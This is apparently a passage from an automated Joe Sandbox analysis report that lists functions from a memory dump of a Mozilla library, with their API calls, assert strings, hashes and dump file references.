                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9A3FA0
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9A3FA7
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C9A3FB4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                                                                                                                                                                                                                                                                        • String ID: nvd3d9wrap.dll$nvinit.dll
                                                                                                                                                                                                                                                                                        • API String ID: 1189858803-2380496106
                                                                                                                                                                                                                                                                                        • Opcode ID: 8e79294dc9d8b2558f488515e618c23241d44965d72f6e8b44dc368ea57dde05
                                                                                                                                                                                                                                                                                        • Instruction ID: d9db2e05ad89c020ab18ab052545c808f936786bbbaa743fce39077269253844
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e79294dc9d8b2558f488515e618c23241d44965d72f6e8b44dc368ea57dde05
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B52F472611B848FD714DF74C880AAB77F9AF65208F14096DE5938BB42DB34F90ACB60
                                                                                                                                                                                                                                                                                        Function 6C98ED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C98EE7A
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C98EFB5
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C991695
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9916B4
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C991770
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C991A3E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3693777188-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3a230924aab56fe7e041dfcb756e7988bdbb574b1a2e7d3a76833217185b93d3
                                                                                                                                                                                                                                                                                        • Instruction ID: 58ac3c185a0790939abd79b3fb5da30e328770ff658ae87762a03b7effe701cf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a230924aab56fe7e041dfcb756e7988bdbb574b1a2e7d3a76833217185b93d3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAB32A71E0121ACFDB14CFA8C890AADB7B6FF49304F1981A9D459AB745D730AD86CF90
                                                                                                                                                                                                                                                                                        Function 6C97FEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7B8), ref: 6C97FF81
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE7B8), ref: 6C98022D
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C980240
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE768), ref: 6C98025B
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE768), ref: 6C98027B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 618468079-3566792288
                                                                                                                                                                                                                                                                                        • Opcode ID: 8a685fee2c6a52d96f566c0bf1474ab2dac4b71d41e488a4b2facc62eba4fe64
                                                                                                                                                                                                                                                                                        • Instruction ID: 7b8b8aaa097177d335eda028bfdcb606fb1684260865f104bf49e10d568d51a4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a685fee2c6a52d96f566c0bf1474ab2dac4b71d41e488a4b2facc62eba4fe64
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07B2C0716067418FD718CF29C590716BBE1BF8A328F28CA6DE96A8FB95C771D840CB40
                                                                                                                                                                                                                                                                                        Function 6C9B5600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                                                                                                                                                                                                                                                                        • API String ID: 0-2712937348
                                                                                                                                                                                                                                                                                        • Opcode ID: afa7780501a7864f5fdb5ed10959dd1737c1a39a329c80efeab0de8a0c9a14c5
                                                                                                                                                                                                                                                                                        • Instruction ID: 7d003f8660a84b44d0618586ceae1dcae65d3a5396797a5e5eca18861ed5dbdd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afa7780501a7864f5fdb5ed10959dd1737c1a39a329c80efeab0de8a0c9a14c5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8926BB1A087419FD724CF28C49079BBBE1BFD9308F15891DE599AB751DB30E809CB92
                                                                                                                                                                                                                                                                                        Function 6C9B2E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C9B2ED3
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9B2EE7
                                                                                                                                                                                                                                                                                        • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C9B2F0D
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9B3214
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9B3242
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9B36BF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strlen$AddressCode$DescribeDetailsFormat
                                                                                                                                                                                                                                                                                        • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                                                                                                                                                                                                                                                                        • API String ID: 2257098003-3318126862
                                                                                                                                                                                                                                                                                        • Opcode ID: 6bef3960a6bdda05fa4be7ef232fcfb35d24026afe602b5e218839815039843a
                                                                                                                                                                                                                                                                                        • Instruction ID: d3226749d973220bd2d666b4a62b7fcccb49fc895fbf21b895538a076093b23b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bef3960a6bdda05fa4be7ef232fcfb35d24026afe602b5e218839815039843a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB328EB0208781AFD324CF24C48069FB7E6BFD9318F54891DE599A7751DB30E94ACB52
                                                                                                                                                                                                                                                                                        Function 6C9A7E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpystrlen
                                                                                                                                                                                                                                                                                        • String ID: (pre-xul)$data$name$schema
                                                                                                                                                                                                                                                                                        • API String ID: 3412268980-999448898
                                                                                                                                                                                                                                                                                        • Opcode ID: b416df43dd5ed532af6929753798ad700afc173e49fda19df7f253ed700febce
                                                                                                                                                                                                                                                                                        • Instruction ID: 9d68f13aa6c3d4749f26215d8680c3b0c914c1e435646556d352cf76d0483218
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b416df43dd5ed532af6929753798ad700afc173e49fda19df7f253ed700febce
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11E19FB1A043408FD710CF68884165BFBE9BFA9314F158A2DE895E7791DB70ED098B91
                                                                                                                                                                                                                                                                                        Function 6C98D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C99D1C5), ref: 6C98D4F2
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C99D1C5), ref: 6C98D50B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96CFE0: EnterCriticalSection.KERNEL32(6C9EE784), ref: 6C96CFF6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96CFE0: LeaveCriticalSection.KERNEL32(6C9EE784), ref: 6C96D026
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C99D1C5), ref: 6C98D52E
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7DC), ref: 6C98D690
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C98D6A6
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE7DC), ref: 6C98D712
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C99D1C5), ref: 6C98D751
                                                                                                                                                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C98D7EA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                                        • Opcode ID: ba74b235e7a4429faefd7a8573a99aea96dd6470d23a1550a831f2623ee0a569
                                                                                                                                                                                                                                                                                        • Instruction ID: aa36dea1bc415cec6ac9dc55b4b33a3a95915be77ebb6fc5544f70e4c791609c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba74b235e7a4429faefd7a8573a99aea96dd6470d23a1550a831f2623ee0a569
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E991C072A097068FDB54CF29C49022AB7E5FFA9714F248D2FE45A87B85D730E840CB81
                                                                                                                                                                                                                                                                                        Function 6C985E90 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 2651COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(-0000000C), ref: 6C985EDB
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(6C9C7765,000000E5,55CCCCCC), ref: 6C985F27
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C985FB2
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(6C9C7765,000000E5,9EC09015), ref: 6C9861F0
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6C987652
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C98730D
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9872E3
                                                                                                                                                                                                                                                                                        • MOZ_CRASH(), xrefs: 6C987BA4
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C987BCD, 6C987C1F, 6C987C34, 6C9880FD
                                                                                                                                                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9872F8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
                                                                                                                                                                                                                                                                                        • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 2613674957-1127040744
                                                                                                                                                                                                                                                                                        • Opcode ID: 21f2b892cda81bbe3a3e103384874709048adbd7d17baddadad44e0807a037b4
                                                                                                                                                                                                                                                                                        • Instruction ID: ef0e232994f97a4720211965b034ab0b2b3b809d56b292e660a808940fe7bba2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21f2b892cda81bbe3a3e103384874709048adbd7d17baddadad44e0807a037b4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92337C716167018FD308CF29C590715BBE2BF85328F29CAADE96A8F7A5D731E841CB41
                                                                                                                                                                                                                                                                                        Function 6C963480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C963492
                                                                                                                                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C9634A9
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C9634EF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C96350E
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C963522
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C963552
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C96357C
                                                                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C963592
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: EnterCriticalSection.KERNEL32(6C9EE370,?,?,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284), ref: 6C99AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99ABD1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                                                        • Opcode ID: e420eb779241901bd7f3fb9bd330ba076284763eb4522cb2515681fa85d8833c
                                                                                                                                                                                                                                                                                        • Instruction ID: 648fb938fede8a9c6fb3ecaed2b143ec0ed9b7b747dc9823ce8965afd75ab121
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e420eb779241901bd7f3fb9bd330ba076284763eb4522cb2515681fa85d8833c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2331C771B042099BDF40DFB5D848AAE7779FF6E708F24441AE505D3A90DB31D904CBA0
                                                                                                                                                                                                                                                                                        Function 6C9C4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6C9C4EFF
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C4F2E
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE ref: 6C9C4F52
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000), ref: 6C9C4F62
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C52B2
                                                                                                                                                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9C52E6
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000010), ref: 6C9C5481
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9C5498
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                                                        • API String ID: 4104871533-3887548279
                                                                                                                                                                                                                                                                                        • Opcode ID: 54e048a4752f7024aa293bb6fa67bc5032acd306c91a34d4f03200606b43e477
                                                                                                                                                                                                                                                                                        • Instruction ID: 906b5c8a08bf72acfc951c83787694e70620791c3a60e6fdf97a3e14fa3afd2d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54e048a4752f7024aa293bb6fa67bc5032acd306c91a34d4f03200606b43e477
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50F1A271A18B408FC716CF39C85062BB7F9AFE6284F158B2EF846A7651DB31D445CB82
                                                                                                                                                                                                                                                                                        Function 6C977810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE744), ref: 6C977885
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE744), ref: 6C9778A5
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE784), ref: 6C9778AD
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE784), ref: 6C9778CD
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE7DC), ref: 6C9778D4
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C9778E9
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6C97795D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C9779BB
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C977BBC
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C977C82
